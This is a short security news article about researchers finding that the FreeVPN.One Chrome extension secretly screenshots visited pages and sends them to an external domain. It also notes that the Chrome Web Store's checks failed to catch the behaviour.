Researchers discovered that the Chrome extension FreeVPN.One secretly spies on users.
FreeVPN.One, a popular VPN extension for Google Chrome with over 100,000 installations, has been secretly spying on users, as discovered by researchers from security company Koi Security. Despite having a verified badge (which gives users a sense of trust) and prominent placement in the Chrome Web Store, the extension takes screenshots of visited websites. These screenshots are then sent to external servers without users’ knowledge.
Invisible Screenshots
The extension installs a script that is automatically injected into every website. Shortly after a page loads, the script triggers an internal call to take a screenshot of the active tab. This image is then sent to an external server via the domain aitd.one, along with information such as the URL and a unique user ID.
Users never receive any warning or visual signal that this is happening. Moreover, the screenshots are not only collected when users activate the ‘Scan with AI Threat Detection’ feature but much earlier, during every website visit. This means sensitive information such as banking details, private photos, and company documents may have been captured.
Control Mechanisms
FreeVPN.One was active in the Chrome Web Store for years without its malicious behavior being noticed. The spying presumably began in version 3.1.3, which was rolled out on July 17, 2025. That’s when the screenshot mechanism was activated and data exfiltration to aitd.one began. A few weeks later, in version 3.1.4, encryption was added and traffic was redirected to a new subdomain to further complicate detection.
Google claims to perform automated and manual checks on extensions in the Chrome Web Store. In this case, those checks proved insufficient. Despite the significant change in the extension’s behavior, FreeVPN.One remained verified and highly visible to new users.